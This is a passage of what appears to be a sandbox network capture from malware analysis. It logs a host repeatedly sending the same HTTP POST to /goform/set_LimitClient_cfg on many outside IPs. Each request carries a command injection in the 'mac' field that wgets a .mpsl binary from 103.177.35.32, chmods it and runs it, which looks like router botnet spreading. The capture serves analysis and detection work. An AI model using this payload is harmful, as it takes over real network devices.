                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2098192.168.2.234290888.80.158.2268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.429769993 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2099192.168.2.235925283.96.154.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430079937 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2100192.168.2.2356356146.135.72.148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430143118 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2101192.168.2.234231079.69.3.728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430206060 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2102192.168.2.2334606177.93.145.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430217981 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2103192.168.2.233469092.253.72.2118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430227041 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2104192.168.2.2350128222.156.120.18080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430237055 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2105192.168.2.23381905.224.30.768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430249929 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2106192.168.2.2347832177.206.212.878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430263042 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2107192.168.2.23336448.117.88.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430320978 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2108192.168.2.2334192128.58.0.1178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430346966 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2109192.168.2.2335270108.244.227.1848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430358887 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2110192.168.2.2340896218.209.181.218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430375099 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2111192.168.2.2357332198.22.234.2438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430393934 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2112192.168.2.235376289.176.210.448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430417061 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2113192.168.2.2334882209.153.64.1638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430444956 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2114192.168.2.233454248.30.39.748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430926085 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2115192.168.2.2346842179.176.183.2388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430938959 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2116192.168.2.235832253.177.58.768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.430985928 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2117192.168.2.2354216110.93.16.2468080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431005955 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2118192.168.2.2337634126.49.121.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431034088 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2119192.168.2.2354526108.52.149.2328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431075096 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2120192.168.2.2350074157.42.192.1508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431098938 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
